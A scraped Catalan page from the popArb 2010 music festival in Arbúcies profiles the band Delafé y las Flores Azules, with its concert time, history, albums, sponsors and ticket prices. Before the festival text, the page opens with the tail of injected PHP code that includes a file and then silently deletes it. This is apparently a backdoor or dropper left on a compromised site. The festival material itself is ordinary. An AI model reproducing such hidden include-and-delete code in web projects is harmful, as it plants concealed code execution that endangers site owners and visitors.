");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> popArb 2010 : cartell : Delafé y las Flores Azules

popArb - Festival de Música Independent feta a Catalunya. Arbucies, Girona

Delafé y las Flores Azules

divendres 25 de juny. 2010
Montsoriu (Can Cassó) 23:30

Les cançons de Delafé y Las Flores Azules estan entre el hip-hop (el parafrasejat) i el pop, (melodies i estructures més pròpies del pop, el soul o l'electrònica). Unes bases molt ben tractades, amb unes lletres que recuperen la tradició del costumisme social dels cantautors. Amb les seves cançons aconsegueixen un estil propi, el que han anomenat alguns mitjans com el Hip-Pop. Grups com Flaming Lips, Beach Boys, The Roots, Dr Octagon, Yo La Tengo o Serrat han influït clarament en la creació dels temes de Delafé y Las Flores Azules. Els seus directes són enriquidors, amb força, participatius, amb una posada en escena original, generosa i contagiosa de felicitat. Si no els has vist mai, més motiu encara per descobrir-los a Arbúcies!

Delafé y Las Flores Azules és una banda de Barcelona integrada per Òscar D'Aniello "Delafé", (Mishima) i Helena Miquel "Las Flores Azules", vocalista d’Élena. Comencen la seva aventura com Facto Delafé i las Flores Azules al costat del seu company Marc Barrachina. El 2002 graven les primeres demos. El setembre de 2003 guanyen el primer premi del concurs "Joves Promeses del Masnou" i el 2004 la cançó Mar el poder del mar és triada com "Cançó del mes" al programa "Disco Grande" de RNE Ràdio 3 conduït per Julio Ruiz. El gener del de 2005 la maqueta El Monstruo de las Ramblas és seleccionada com a millor maqueta de l'any 2004 per votació dels oients del mateix programa. El novembre de 2005 editen el seu primer disc Vs El Monstruo de las Ramblas amb Music Bus. A partir d'aquí comencen a despuntar en el panorama musical espanyol: el seu primer single Mar el poder del Mar es pot escoltar en moltes emissores de ràdio, la recomanació de la crítica és unànime, es parla d'ells com a grup revelació i això els porta a fer concerts per tot Espanya, mentre que el videoclip del tema aconsegueix un gran èxit i collita diversos premis.

El director de cinema Bigas Luna els contracta per compondre i interpretar tres dels temes originals del film "Yo soy la Juani". El juliol de 2007 i en motiu de la reedició del disc Vs El Monstruo de las Ramblas amb Warner Music Spain, es presenta el segon single La Fuerza, una de les cançons més representatives del grup, amb la seva videoclip, rodat amb la col.laboració de fans del grup.

En el seu segon treball, La luz de la mañana mostren la seva vessant més festiva, positiva, brillant i optimista, tant en les seves lletres com en els seu so. Amb el tercer, Vs las trompetas de la muerte, que presentaran al popArb’10, Oscar D'Aniello i Helena Miquel enceten una nova etapa al costat de Dani Acedo (Mishima) i sota la producció de The Pinker Tones. Intenten anar una mica més enllà i reinventar-se, sense perdre l'estil original del grup. En aquest disc es barregen cançons plenes de llum, d'alegria i festivitat amb hits que ens faran ballar en els propers anys. Els vents (trompeta, trombó i saxo) tenen un gran protagonisme i importància, d'aquí el joc de paraules del títol del disc, ja que les trompetes de la mort també són uns saborosos bolets, sobretot els del Montseny.

Organitzen: Ajuntament d'Arbcies, Cultura Dispersa

Collaboren: Departament de Cultura i Mitjans de Comunicaci de la Generalitat de Catalunya, Diputaci de Girona, AiE

Mitjans Oficials: TV3, iCat fm

Recomanat per: Scanner fm, Enderrock, Nativa, Butxaca, TresC

Col·laboradors: Demasié, FETE, cupatges,Vialis-Aro, Guerrilla Sound

 

estrella damm

Estrella Damm patrocina el popArb 2010

Venda a ServiCaixa

atrapalo

Abonaments i entrades de dia a Servicaixa.com.

Divendres: 30€
Dissabte: 35€
Abonament: 45€

Consulteu Servicaixa.com per conèixer preu de gestió i descomptes aplicables.

popArb 2010 © | culturaDispersa SL | Avís LegalSobre el popArb
RSS | youtube/popArb2009 || myspace/poparb